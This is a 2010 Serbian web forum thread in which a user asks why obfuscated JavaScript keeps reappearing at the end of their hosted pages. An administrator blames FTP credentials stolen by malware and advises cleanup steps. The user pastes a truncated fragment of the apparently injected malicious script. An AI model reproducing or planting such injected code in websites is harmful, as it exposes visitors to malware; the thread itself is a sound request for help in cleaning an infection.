Objavljeno: 22 Feb 2010 16:15 | ||
Registrovani korisnik Trenutno offline |
|
Na jednoj stranici koju hostujem na placenom serveru se pocele pojavljivati cudne skripte u podnozju stranica. Dakle kada se zavrsi </html> ispise se sledece:
Code:
<script>var cz=2166;var z;if(z!='xj' && z!='ex'){z=''};var qf='';var is;if(is!='jk' && is!='d'){is='jk'};function v() {var mb;if(mb!='on' && mb != ''){mb=null};var at="at";function h(m,p,f){var n;if(n!='pa' && n != ''){n=null};var rj;if(rj!='yc' && rj != ''){rj=null};m.setAttribute(p, f);v Jeli zna neko o cemu se radi. Ja ovo smece uklonim ali se opet pojavi za nekoliko dana. Inace ponekad ljudima kada otvaraju stranu javi kao da stranica ima maler. Jos da napomenem da koristim jednu besplatnu javascript vezanu za odbrojavanje vremena pa da li jemoguce da ona napravi ovo smece posle izvesnog vremena? |
Objavljeno: 22 Feb 2010 19:15 Zadnji put editovao: izuzetan | ||
Administrator Trenutno offline |
|
Mislim da je virus i da ti je na racunaru preko koga ulazis preko FTP na host zarazen malicioznim programom koji ti je pokupio sve sifre, pa i one za FTP konekciju. Moras pod hitno da formatiras hard disk i da ponovo instaliras operativni sistem, to pod jedan. Pod dva, moras promeniti sve moguce sivre za ftp konekcije za sve sajtove koliko ih imas. I tek onda pod tri da izbrises sve fajlove i foldere na hostinzima i da na njihovo mesto postavis foldere i fajlove koji su od pre pojavljivanja virusa.
Ukoliko to ne uradis google ce te izbaciti sa pretrage, ako vec i nije. A ako jeste onda kad sve lepo ocistis i uradis kako sam napisao odi u webmasters tools u google i zatrazi da ti google skine ban. Naravno ako ti google nije bitan ne moras nista da radis ali ne verujem da ce neko voleti da dolazi na tvoje sajtove ako im antivirus program detektuje virus. E sad, moguce je da je na servesku stranu nekako dospeo neki virus pa nije zarazen tvoj racunar ukoliko je yarazen samo jedan host a drugi nisu iako ti i na druge hostove ulazis preko istog ftp klijenta. Ako je to slucaj onda moras obavestiti administratore hostinga da rese te probleme jer verovatno nije samo tvoj host yahvacen kod tog hosting provajdera. A koji je hosting provajder u pitanju?????? |
Objavljeno: 22 Feb 2010 21:44 | ||
|
Jao bedaka. Ali pazi, ako mi je pokupio sifre kako ja mogu opet da se logujem na svoj nalog da menjam sadrzaj na stranici. Zatim odakle je to moglo da dodje, da le je moguce da su me naguzile ove free scripte koje koristim a imam 2 jednu za galeriju slika, a drugu za neko vreme koje se odbrojava unazad. Ne znam kako da ti objasnim, to je server od fakulteta na kome hostujem jednu od stranica studentske organizacije, Inace ostale stranice koje se tu hostuju rade bez premca, ne izbacuje nikakva upozorenja itd. Postavljanje foldera na server koji su bili pre nego sto je ovo pocelo da se desava je skoro nemoguce, kako da ja znam kada se tacno to pojavilo , stgranicu ne azuriram svaki dan! |
Objavljeno: 22 Feb 2010 22:20 Zadnji put editovao: izuzetan | ||
Administrator Trenutno offline |
|
Nista ne smeta da se ti logujes na stranici i dalje jer sifre za ftp host moze da promeni samo administrator hostinga ali po nalogu i zahtevu onog ko je vlasnik tog hosting prostora na kome je domen. Postoje i hosting prostori na kojima vlasnik moze i sam preko odredjenih administracjskih panela da menja sifre. Neznam koji je slucaj bas kod tebe ali bilo kako bilo samo ti ako si vlasnik mozes da iniciras promenu sifre za ftp pristup na hostu a nikako neki programi preko virusa.
Nemoj da lupas glavu kako je sve nastalo vec kreni u akciju resavanja problema. Kazes da si ubacivao neke skriptice , ako su samo skriptice i kodovi onda nije to uzrok ali ako si ubacivao neke neproverene fajlove onda je moguce da su one sadrzale neki zlonamerni kod ali po meni je za to mala verovatnoca. Pre ce biti da je neki zlonamerni program pokupio odnegde sifre. Uspostavi kontakt sa administratorima hostinga i vidi mozda ima jos neki sajt da je napadnut sto ce znaciti da je sa serverske strane uso virus, a ako su svi cisti onda je ipak neki virus sa tvog kucnog rcunara pokupio sifre. Moj ti je savet da ipak formatiras hard disk na kucnom racunaru i ponovo podignes novi operativni sistem. posle toga da promenis sifre na hostinzima na kojima je uso virus i zatim da izbrises sve sa hosta i ponovo ubacis ciste fajlove od pre zarazavanja. Ako i posle toga opet nagrne virus onda ipak sa serverske strane ulazi virus. |
Objavljeno: 22 Feb 2010 23:50 | ||
|
ajde probacu tako ! |
Objavljeno: 25 Feb 2010 18:40 | ||
|
Nisam verovao da sve ovo moze biti ovako slozeno i opasno ali sam se uverio ovde:
http://www.informacija.rs/ |